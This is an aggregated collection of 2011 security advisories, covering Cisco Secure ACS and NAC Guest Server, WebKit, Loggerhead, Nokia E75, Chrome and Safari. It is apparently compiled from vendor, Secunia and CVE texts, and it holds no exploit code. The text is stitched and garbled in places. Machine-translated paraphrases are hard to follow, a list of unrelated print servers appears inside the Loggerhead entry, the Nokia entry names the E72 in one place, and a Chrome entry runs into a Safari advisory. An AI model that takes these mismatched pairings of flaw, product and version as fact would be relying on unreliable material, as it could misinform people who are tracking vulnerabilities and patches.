Secure ACS versions are affected by this vulnerability: * Cisco Secure ACS version 5.1 with patch 3, 4, or 5 (or any combination of these patches) installed and without patch 6 or later installed * Cisco Secure ACS version 5.2 without any patches installed * Cisco Secure ACS version 5.2 with patch 1 or 2 (or both of these patches) installed and without patch 3 or later installed The previous list applies to both the hardware appliance and the software-only versions of the product. The following methods can be used to determine which version of the Cisco Secure ACS is installed: * From the Cisco Secure ACS command-line interface (CLI), issue the "show version" command, as shown in the following example: acs51a/admin# show version Cisco Application Deployment Engine OS Release: 1.2 ADE-OS Build Version: 1.2.0.152 ADE-OS System Architecture: i386 Copyright (c) 2005-2009 by Cisco Systems, Inc. All rights reserved. Hostname: acs51a Version information of installed applications --------------------------------------------- Cisco ACS VERSION INFORMATION ----------------------------- Version : 5.1.0.44.6 Internal Build ID : B.2347 Patches : 5-1-0-44-3 5-1-0-44-6 acs51a/admin# * On the main login page of the Cisco Secure ACS web-based interface, the version information is displayed on the left side of the screen. The presence of an additional digit after the version number indicates the highest patch level installed. The absence of any additional digit after the version string indicates a Cisco Secure ACS version with no patches installed. No other Cisco products are currently known to be affected by this vulnerability. Successful exploitation requires the user account to be defined on the internal identity store. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtl77440 ("Able to arbitrarily change user account passwords") CVSS Base Score - 5.0 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - Partial Availability Impact - None CVSS Temporal Score - 4.4 Exploitability - High Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of this vulnerability could allow an attacker to change the password of any user account that is defined on the internal identity store. Because the user would not know the new password, the attacker could also prevent a user from authenticating. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Customers can implement the UCP functionality through either a web-based front-end application or a scripting interface. Because this access would allow exploitation of the vulnerability described in this advisory, both of the following recommendations apply: * Stop providing UCP services * Do not include any computer that offers UCP services (either web-based or scripted) in the set of management stations that are allowed to access the ACS server Obtaining Fixed Software ======================== Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was found during internal testing. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +------------------------------------------------------------+ | Revision 1.0 | 2011-March-30 | Initial public release. | +------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: Mar 30, 2011 Document ID: 112913 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iF4EAREIAAYFAk2TR14ACgkQQXnnBKKRMNBJ/QD/UfAf8bg3i7og/U7d0WVTQX6p 33sdmFcCI5RvrbqXIVAA/10DfgXyajCCY0vL+gNCFwIu+7gONOvksL1/8wcdWmOa =7sC3 -----END PGP SIGNATURE-----

The default configuration of the RADIUS authentication feature on the Cisco Network Admission Control (NAC) Guest Server with software before 2.0.3 allows remote attackers to bypass intended access restrictions and obtain network connectivity via unspecified vectors, aka Bug ID CSCtj66922. The problem is Bug ID CSCtj66922 It is a problem.A third party may bypass access restrictions and establish a network connection. This misconfiguration allows unauthenticated users to access the protected network. This vulnerability could cause authentication to be bypassed without a legitimate username and password. Successfully exploiting this issue will lead to other attacks. This issue is being monitored by Cisco Bug ID CSCtj66922. Cisco has released free software updates that address this vulnerability. The software version is displayed on the login page of the web server. Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by this vulnerability. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss * CSCtj66922 - Authentication Bypass Vulnerability CVSS Base Score - 5.0 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Partial Integrity Impact - None Availability Impact - None CVSS Temporal Score - 4.1 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerability may allow unauthorized users to access the protected network. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Software versions prior to 2.0.3 are affected by this vulnerability. The following commands modify the RADIUS configuration line file and restart the RADIUS daemon to read the new configuration file. The configuration file may be modified by running the following command from the command-line interface (CLI) of the device: # cp /etc/raddb/radiusd.conf /etc/raddb/radiusd.conf.orig # sed -i 's/php -f/php/g' /etc/raddb/radiusd.conf # service radiusd restart Obtaining Fixed Software ======================== Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml The latest version of Cisco NAC Guest Access Server system software may be obtained at: http://www.cisco.com/cisco/software/release.html?mdfid=282450822&flowid=4363&softwareid=282562545 Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110330-nac.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2011-March-30 | public | | | | release. | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iF4EAREIAAYFAk2SP6oACgkQQXnnBKKRMNDXIQD+PY3O6psutgOEuGgoQiwnxyL0 xBLnUBixiJutn9gqI/YA/3M8U1LY5JSG++amGdDJEpa89hM32kpBdjqQaSQWVH6K =OUeQ -----END PGP SIGNATURE-----

The counterToCSSValue function in CSSComputedStyleDeclaration.cpp in the Cascading Style Sheets (CSS) implementation in WebCore in WebKit before r82222, as used in Google Chrome before 11.0.696.43 and other products, does not properly handle access to the (1) counterIncrement and (2) counterReset attributes of CSSStyleDeclaration data provided by a getComputedStyle method call, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted JavaScript code. WebKit of WebCore Is in CSSComputedStyleDeclaration.cpp of counterToCSSValue the function is, getComputedStyle Granted by method call CSSStyleDeclaration Data (1) counterIncrement ,and (2) counterReset Service operation is interrupted because the processing related to property access is not performed properly. (Null Pointer dereference and application crash ) There is a vulnerability that becomes a condition.Skillfully crafted by a third party JavaScript Service disruption through code (Null Pointer dereference and application crash ) There is a possibility of being put into a state. WebKit is prone to a denial-of-service vulnerability because of a NULL-pointer dereference exception. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome

Cross-site scripting (XSS) vulnerability in templatefunctions.py in Loggerhead before 1.18.1 allows remote authenticated users to inject arbitrary web script or HTML via a filename, which is not properly handled in a revision view. Loggerhead is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks. Loggerhead versions prior to 1.18.1 are vulnerable. The following print servers are affected: Encore ENPS-2012 TP-Link TL-PS110U TP Link TL-PS110P Planex Mini-300PU Planex Mini100s ZO Tech PA101 Fast Parallel Port Print Server ZO Tech PU201 Fast USB Print Server ZO Tech PA301 Parallel Port Print Server ZO Tech PS531 USB and Parallel Print Server Longshine Multiple Print Server ZOT-PS-47/9.8.0015 Longshine Multiple Print Server ZOT-PS-35/6.2.0001 Longshine Multiple Print Server ZOT-PS-39/6.3.000. This fixes a vulnerability, which can be exploited by malicious users to conduct script insertion attacks. For more information: SA43822 SOLUTION: Apply updated packages via the yum utility ("yum update loggerhead"). ---------------------------------------------------------------------- Meet Secunia @ Microsoft Management Summit (MMS) in Las Vegas, USA (21-25 March). http://secunia.com/company/events/mms_2011/ ---------------------------------------------------------------------- TITLE: Loggerhead Filename Script Insertion Vulnerability SECUNIA ADVISORY ID: SA43822 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43822/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43822 RELEASE DATE: 2011-03-25 DISCUSS ADVISORY: http://secunia.com/advisories/43822/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43822/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43822 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: daveb has reported a vulnerability in loggerhead, which can be exploited by malicious users to conduct script insertion attacks. Input related to the filename is not properly sanitised in loggerhead/templatefunctions.py before being used to display a filename in a revision view. The vulnerability has been reported in version 1.18. SOLUTION: Update to version 1.18.1. PROVIDED AND/OR DISCOVERED BY: Reported by daveb in a bug report. ORIGINAL ADVISORY: https://launchpad.net/loggerhead/1.18/1.18.1 https://bugs.launchpad.net/loggerhead/+bug/740142 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Nokia E75 phone with firmware before 211.12.01 allows physically proximate attackers to bypass the Device Lock code by entering an unspecified button sequence at boot time. Nokia E72 is prone to an authentication-bypass vulnerability. Nokia E75 is a smartphone launched by Nokia Corporation. ---------------------------------------------------------------------- Meet Secunia @ Microsoft Management Summit (MMS) in Las Vegas, USA (21-25 March). http://secunia.com/company/events/mms_2011/ ---------------------------------------------------------------------- TITLE: Nokia E75 Lock Code Bypass Vulnerability SECUNIA ADVISORY ID: SA43827 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43827/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43827 RELEASE DATE: 2011-03-24 DISCUSS ADVISORY: http://secunia.com/advisories/43827/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43827/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43827 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Nokia E75, which can be exploited by malicious people with physical access to bypass certain security restrictions. The vulnerability is reported in firmware prior to 211.12.01. SOLUTION: Update to firmware 211.12.01 or later. PROVIDED AND/OR DISCOVERED BY: Markus Heikkil\xe4, Nixu Oy via CERT-FI. ORIGINAL ADVISORY: http://www.cert.fi/en/reports/2011/vulnerability410355.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Google Chrome before 10.0.648.204 does not properly handle SVG text, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer.". Google Chrome Is SVG Insufficient operation of text due to improper handling of text (DoS) There are vulnerabilities that can be in a state or are otherwise unaffected.Service disruption by a third party (DoS) You may be put into a state or affected by other details. Google Chrome is prone to multiple vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks may also be possible. Versions prior to Chrome 10.0.648.204 are vulnerable. Google Chrome is a web browser developed by Google (Google). ---------------------------------------------------------------------- The Secunia Vulnerability Intelligence Manager (VIM) enables you to handle vulnerability threats in a simple, cost effective way. Read more and request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Apple Safari Multiple Vulnerabilities SECUNIA ADVISORY ID: SA45325 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45325/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45325 RELEASE DATE: 2011-07-22 DISCUSS ADVISORY: http://secunia.com/advisories/45325/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/45325/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=45325 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A weakness and multiple vulnerabilities have been reported in Apple Safari, which can be exploited by malicious people to disclose sensitive information, manipulate certain data, conduct cross-site scripting and spoofing attacks, bypass certain security restrictions, and compromise a user's system. 2) An error within CFNetwork when using the NTLM authentication protocol can be exploited to execute arbitrary code by tricking a user into visiting a specially crafted web page. 3) An error exists within CFNetwork when handling SSL certificates, which does not properly verify disabled root certificates. This can lead to certificates signed by the disabled root certificates being validated. 4) An integer overflow error exists within the ColorSync component. For more information see vulnerability #5 in: SA45054 5) An off-by-one error exists within the CoreFoundation framework. For more information see vulnerability #6 in: SA45054 6) An integer overflow error exists in CoreGraphics. For more information see vulnerability #7 in: SA45054 7) An error exists within ICU (International Components for Unicode). For more information see vulnerability #11 in: SA45054 8) An error exists in ImageIO within the handling of TIFF files when handling certain uppercase strings. For more information see vulnerability #9 in: SA45054 9) An error in ImageIO within the handling of CCITT Group 4 encoded TIFF image files can be exploited to cause a heap-based buffer overflow. 10) A use-after-free error within WebKit when handling TIFF images can result in an invalid pointer being dereferenced when a user views a specially crafted web page. 11) An error within libxslt can be exploited to disclose certain addresses from the heap. For more information see vulnerability #2 in: SA43832 12) An off-by-one error within libxml when handling certain XML data can be exploited to cause a heap-based buffer overflow. 13) An error in the "AutoFill web forms" feature can be exploited to disclose certain information from the user's Address Book by tricking a user into visiting a specially crafted web page. 14) A cross-origin error when handling certain fonts in Java Applets can lead to certain text being displayed on other sites. 15) Multiple unspecified errors in the WebKit component can be exploited to corrupt memory. 16) An error within WebKit when handling libxslt configurations can be exploited to create arbitrary files. 17) A cross-origin error when handling Web Workers can lead to certain information being disclosed. 20) An error within the handling of DOM history objects can be exploited to display arbitrary content while showing the URL of a trusted web site in the address bar. 21) An error within the handling of RSS feeds may lead to arbitrary files from a user's system being sent to a remote server. 22) A weakness in WebKit can lead to remote DNS prefetching For more information see vulnerability #6 in: SA42312 23) A use-after-free error within WebKit when processing MathML markup tags can result in an invalid pointer being dereferenced when a user views a specially crafted web page. 24) An error within WebKit when parsing a frameset element can be exploited to cause a heap-based buffer overflow. 25) A use-after-free error within WebKit when handling XHTML tags can result in an invalid tag pointer being dereferenced when a user views a specially crafted web page. 26) A use-after-free error within WebKit when handling SVG tags can result in an invalid pointer being dereferenced when a user views a specially crafted web page. SOLUTION: Update to version 5.1 or 5.0.6. PROVIDED AND/OR DISCOVERED BY: 10) Juan Pablo Lopez Yacubian via iDefense 4) binaryproof via ZDI 8) Dominic Chell, NGS Secure 23, 25, 26) wushi, team509 via iDefense 24) Jose A. Vazquez via iDefense The vendor credits: 1) Hidetake Jo via Microsoft Vulnerability Research (MSVR) and Neal Poole, Matasano Security 2) Takehiro Takahashi, IBM X-Force Research 3) An anonymous reporter 5) Harry Sintonen 6) Cristian Draghici, Modulo Consulting and Felix Grobert, Google Security Team 7) David Bienvenu, Mozilla 9) Cyril CATTIAUX, Tessi Technologies 11) Chris Evans, Google Chrome Security Team 12) Billy Rios, Google Security Team 13) Florian Rienhardt of BSI, Alex Lambert, and Jeremiah Grossman 14) Joshua Smith, Kaon Interactive 16) Nicolas Gregoire, Agarri 17) Daniel Divricean, divricean.ro 18) Jobert Abma, Online24 19) Sergey Glazunov 20) Jordi Chancel 21) Jason Hullinger 22) Mike Cardwell, Cardwell IT The vendor provides a bundled list of credits for vulnerabilities in #15: * David Weston, Microsoft and Microsoft Vulnerability Research (MSVR) * Yong Li, Research In Motion * SkyLined, Google Chrome Security Team * Abhishek Arya (Inferno), Google Chrome Security Team * Nikita Tarakanov and Alex Bazhanyuk, CISS Research Team * J23 via ZDI * Rob King via ZDI * wushi, team509 via ZDI * wushi of team509 * Adam Barth, Google Chrome Security Team * Richard Keen * An anonymous researcher via ZDI * Rik Cabanier, Adobe Systems * Martin Barbella * Sergey Glazunov * miaubiz * Andreas Kling, Nokia * Marek Majkowski via iDefense * John Knottenbelt, Google ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT4808 iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=930 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=931 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=932 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=933 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=934 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-228/ NGS Secure: http://archives.neohapsis.com/archives/bugtraq/2011-07/0034.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ---------------------------------------------------------------------- Meet Secunia @ Microsoft Management Summit (MMS) in Las Vegas, USA (21-25 March). PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Alex Turpin. 2) Slawomir Blazek. 3-6) Sergey Glazunov. ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2011/03/stable-channel-update.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities

